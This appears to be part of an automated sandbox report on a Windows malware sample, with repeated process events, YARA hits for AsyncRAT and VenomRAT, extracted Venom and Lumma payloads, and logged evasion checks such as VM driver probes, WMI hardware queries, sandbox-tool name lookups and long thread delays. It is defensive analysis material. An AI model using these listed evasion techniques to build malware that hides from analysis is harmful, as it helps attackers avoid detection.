Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check for Windows Defender sandbox

Source: C:\Users\user\AppData\Local\Temp\F6D9.exe

File Queried: C:\INTERNAL\__empty

Yara detected AsyncRAT

Source: Yara match	File source: 37.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.vm.exe.28c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.vm.exe.28c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match	File source: Process Memory Space: vm.exe PID: 392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vm.exe PID: 5776, type: MEMORYSTR

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\7Y18r(14).exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\7Y18r(14).exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\7Y18r(14).exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\7Y18r(14).exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\7Y18r(14).exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\7Y18r(14).exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ftejced	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\ftejced	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\ftejced	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\ftejced	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\ftejced	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\ftejced	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	System information queried: FirmwareTableInformation

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\7Y18r(14).exe	API/Special instruction interceptor: Address: 7FF8418CE814
Source: C:\Users\user\Desktop\7Y18r(14).exe	API/Special instruction interceptor: Address: 7FF8418CD584
Source: C:\Users\user\AppData\Roaming\ftejced	API/Special instruction interceptor: Address: 7FF8418CE814
Source: C:\Users\user\AppData\Roaming\ftejced	API/Special instruction interceptor: Address: 7FF8418CD584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vm.exe, 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, vm.exe, 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp

Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE

Source: C:\Users\user\AppData\Local\Temp\753F.exe	Memory allocated: 1C0F25F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Memory allocated: 1C0F3D80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Memory allocated: 1C0F76E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Memory allocated: 2AC86500000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Memory allocated: 2AC9FE60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 170000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 2A80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 28A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 110000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 28F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Memory allocated: 48F0000 memory reserve \| memory write watch

Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\VBoxSF.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\vmnet.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\vmmouse.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\vboxtray.exe	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\vboxhook.dll	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\VBoxGuest.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\VBoxVideo.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\vmci.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\drivers\VBoxMouse.sys	Jump to behavior
Source: C:\Windows\explorer.exe	File opened / queried: C:\Windows\System32\vboxservice.exe	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 32_2_00007FF7C0971049 sldt word ptr [eax]

32_2_00007FF7C0971049

Source: C:\Users\user\AppData\Local\Temp\753F.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 420	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 984	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 610	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3881	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 799	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 812	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Window / User API: threadDelayed 1421
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9216
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Window / User API: threadDelayed 4884

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe

Evaded block: after key decision

graph_17-1055

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_5-1048

Source: C:\Windows\explorer.exe TID: 2104	Thread sleep time: -98400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2572	Thread sleep time: -61000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2104	Thread sleep time: -388100s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\753F.exe TID: 7548	Thread sleep count: 1421 > 30
Source: C:\Users\user\AppData\Local\Temp\753F.exe TID: 7596	Thread sleep count: 66 > 30
Source: C:\Users\user\AppData\Local\Temp\753F.exe TID: 1504	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\753F.exe TID: 1816	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\753F.exe TID: 4200	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\753F.exe TID: 7524	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\753F.exe TID: 3528	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7084	Thread sleep time: -210000s >= -30000s
